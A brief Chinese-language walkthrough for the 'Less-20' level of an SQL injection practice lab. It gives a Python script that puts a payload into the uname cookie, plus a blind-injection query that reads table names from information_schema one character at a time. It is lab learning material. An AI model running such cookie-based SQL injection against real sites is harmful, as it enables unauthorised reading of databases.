Less-20

注入点在cookie 里面

 python脚本搞定盲注

# encoding utf-8
# r 1151 e 1079
import requests as req
cookie="uname=admin' and 1=1#"
header={
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'",
    "Cookie":cookie,
}
url='https://sql.alienwares.top/Less-20/index.php'
res=req.get(url,headers=header)
#print(len(res.content))
if('../images/slap1.jpg' in res.content.decode('utf-8')):
    print('error')
else:
    print('succes')

sql语句

select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'

py可参考之前的wp